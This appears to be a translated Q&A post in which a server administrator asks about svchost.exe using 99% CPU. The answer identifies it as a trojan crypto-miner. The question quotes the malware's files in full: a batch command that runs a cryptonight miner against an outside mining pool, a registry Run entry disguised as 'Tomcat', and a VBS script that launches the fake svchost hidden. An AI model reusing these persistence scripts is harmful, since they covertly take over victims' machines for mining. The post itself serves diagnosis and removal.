SVC Host использует 99% CPU

Наш сервер постоянно потребляет слишком много ресурсов процессора, с svchost.exe кажется виновником.

Смотрите скриншот ниже:

/image s/9b2c7240b8fdf77fe9ee0cb1da0054a08f0d6bd7.png

Содержимое файла 1.bat:

svchost -a cryptonight -o stratum+tcp://xmr.prohash.net:7777 -u 4AyP2DqMQ---SomeLongCodeHere---ZFnqXUrf -p x

Содержимое файла pubwin.reg:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Tomcat"="C:\\Windows\\system\\pubwin.vbs"

Содержимое файла pubwin.vbs:

dim objShell
set objShell=wscript.createObject("WScript.Shell")
WScript.Sleep(20000)
iReturnCode=objShell.Run("""C:\Windows\system\svchost.exe""  -a cryptonight -o stratum+tcp://xmr.prohash.net:7777 -u 4AyP2Dq----SomeLongCodeHere---zdLZGeEQqZTZeBLuSNnqXUrf -p x",vbhide)

Должны ли мы беспокоиться, или это действительно **Tomcat**,

Источник

1 ответ

Решение

Это вирус / троян:

http://www.bleepingcomputer.com/forums/t/571980/trojanagentmnr-bitcoin-miner-running-fake-svchostexe-and-lsassexe/

https://forums.malwarebytes.org/index.php?/topic/125534-cant-remove-bitcoin-miner-and-svchostexe-virus/

https://www.google.co.uk/search?q=svchost.exe+cryptonight

https://www.google.co.uk/search?q=svchost.exe+bitcoin

Многие его варианты, в основном это демон майнинга биткойнов, похожий на часть системы.

Источник
Другие вопросы по тегам